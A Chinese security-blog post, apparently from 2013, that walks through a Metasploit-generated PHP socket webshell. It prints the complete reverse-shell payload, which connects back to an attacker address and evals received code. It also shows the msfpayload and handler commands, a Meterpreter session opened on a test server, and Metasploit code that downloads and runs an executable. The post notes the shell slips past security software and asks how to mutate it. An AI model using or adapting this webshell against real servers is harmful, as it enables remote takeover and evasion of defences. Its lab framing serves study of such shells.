Metasploit之使用socket通信的webshell简单分析

y3p 2013-01-09 234944人围观 ,发现 11 个不明物体 WEB安全

感谢y3p投递

0×01 前言 

常规的webshell都是调用该语言中习惯函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。 

常见的脚本语言asp,php,jsp,都可以实现对应的socket编程。例如使用msf中: 

msfpayload php/reverse_php LHOST=自己的IP LPORT=端口 R > sha1.php

生成的php_webshell: 

#<?php 
error_reporting(0); 
# The payload handler overwrites this with the correct LHOST before sending 
# it to the victim. 
$ip = '192.168.1.5'; 
$port = 2013; 
$ipf = AF_INET; 
if (FALSE !== strpos($ip, ":")) { 
  # ipv6 requires brackets around the address 
  $ip = "[". $ip ."]"; 
  $ipf = AF_INET6; 
} 
if (($f = 'stream_socket_client') && is_callable($f)) { 
  $s = $f("tcp://{$ip}:{$port}"); 
  $s_type = 'stream'; 
} elseif (($f = 'fsockopen') && is_callable($f)) { 
  $s = $f($ip, $port); 
  $s_type = 'stream'; 
} elseif (($f = 'socket_create') && is_callable($f)) { 
  $s = $f($ipf, SOCK_STREAM, SOL_TCP); 
  $res = @socket_connect($s, $ip, $port); 
  if (!$res) { die(); } 
  $s_type = 'socket'; 
} else { 
  die('no socket funcs'); 
} 
if (!$s) { die('no socket'); } 

switch ($s_type) { 
case 'stream': $len = fread($s, 4); break; 
case 'socket': $len = socket_read($s, 4); break; 
} 
if (!$len) { 
  # We failed on the main socket.  There's no way to continue, so 
  # bail 
  die(); 
} 
$a = unpack("Nlen", $len); 
$len = $a['len']; 

$b = ''; 
while (strlen($b) < $len) { 
  switch ($s_type) { 
  case 'stream': $b .= fread($s, $len-strlen($b)); break; 
  case 'socket': $b .= socket_read($s, $len-strlen($b)); break; 
  } 
} 
# Set up the socket for the main stage to use. 
$GLOBALS['msgsock'] = $s; 
$GLOBALS['msgsock_type'] = $s_type; 
eval($b); 
die(); 
?>

0×02 实例 

本机      (192.168.1.5)  : win03+msf+ie 

测试服务器(192.168.1.108): win03+apache+safedog 

设置相关模块: 

msf > use multi/handler 
msf  exploit(handler) > et PAYLOAD php/meterpreter/reverse_tcp 
[-] Unknown command: et. 
msf  exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp 
PAYLOAD => php/meterpreter/reverse_tcp 
msf  exploit(handler) >  set LHOST 192.168.1.5 
LHOST => 192.168.1.5 
msf  exploit(handler) > set LPORT 2013 
LPORT => 2013 
msf  exploit(handler) > exploit -j 
[*] Exploit running as background job.

使用浏览器访问木马地址(假设我们已经上传到目标机): 

http://192.168.1.108/sha1.php

成功返回一个Meterpreter session: 

msf  exploit(handler) > 
[*] Started reverse handler on 192.168.1.5:2013 
[*] Starting the payload handler... 
[*] Sending stage (39217 bytes) to 192.168.1.108 
[*] Meterpreter session 2 opened (192.168.1.5:2013 -> 192.168.1.108:1052) at 2013-01-08 20:13:52 +0800 
msf  exploit(handler) > sessions -l 
Active sessions 
=============== 
  Id  Type                 Information            Connection 
  --  ----                 -----------            ---------- 
  2   meterpreter php/php  SYSTEM (0) @ WIN03SP0  192.168.1.5:2013 -> 192.168.1.108:1052 (192.168.1.108) 
msf  exploit(handler) > sessions -i 2 
[*] Starting interaction with 2... 
meterpreter > sysinfo 
Computer    : WIN03SP0 
OS          : Windows NT WIN03SP0 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586 
Meterpreter : php/php 
meterpreter >

如图,phpspy.php安全狗正常拦截,sha1.php正常运行: 


然后我们可以执行诸如ls列目录,ps查看进程信息等命令。 

0×03 分析 

在0×02中在获取的Meterpreter sessions中我们使用 

meterpreter > execute -f c:\\sha1.exe

这个命令来执行可执行文件,如图所示: 


def php_exec_file 
    exename = Rex::Text.rand_text_alpha(rand(8) + 4) 
    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4) 
    shell = <<-END_OF_PHP_CODE 
    if (!function_exists('sys_get_temp_dir')) { 
      function sys_get_temp_dir() { 
        if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); } 
        if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); } 
        if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); } 
        $tempfile=tempnam(uniqid(rand(),TRUE),''); 
        if (file_exists($tempfile)) { 
          @unlink($tempfile); 
          return realpath(dirname($tempfile)); 
        } 
        return null; 
      } 
    } 
    $fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe"; 
    $fd_in = fopen("#{datastore['URL']}", "rb"); 
    $fd_out = fopen($fname, "wb"); 
    while (!feof($fd_in)) { 
      fwrite($fd_out, fread($fd_in, 8192)); 
    } 
    fclose($fd_in); 
    fclose($fd_out); 
    chmod($fname, 0777); 
    $c = $fname; 
    #{php_preamble({:disabled_varname => dis})} 
    #{php_system_block({:cmd_varname => "$c", :disabled_varname => dis})} 
    @unlink($fname); 
    END_OF_PHP_CODE 

    #return Rex::Text.compress(shell) 
    return shell 
  end

0×04 总结 

这种方式执行的webshell,一般的安全防护软件应该还没对此进行监控与防御。大概原因在于这种方式的webshell的利用不是那么方便。但是如果哪位大神有好用的工具,这种webshell还是不错的。 

0×05 问题 

1.是否有安全软件对这种shell有防护效果 
2.这种shell本身是否有什么缺陷 
3.如何防这种shell 
4.如何变形 
5.more..

这些评论亮了

  • anlfi (5级) 回复
    Getsystem
    提权妥妥的 特别是Linux exp难找的时候
    这才是反弹的意义
    Msf
    )10( 亮了
发表评论

已有 11 条评论

取消
Loading...
css.php